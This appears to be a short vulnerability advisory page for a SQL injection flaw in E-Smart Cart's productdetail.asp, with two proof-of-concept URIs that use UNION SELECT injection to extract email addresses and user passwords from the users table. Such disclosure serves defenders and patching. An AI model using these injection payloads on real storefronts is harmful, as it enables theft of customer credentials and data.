• info
• discussion
• exploit
• solution
• references

E-Smart Cart Productdetail.ASP SQL Injection Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
http://www.example.com/productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users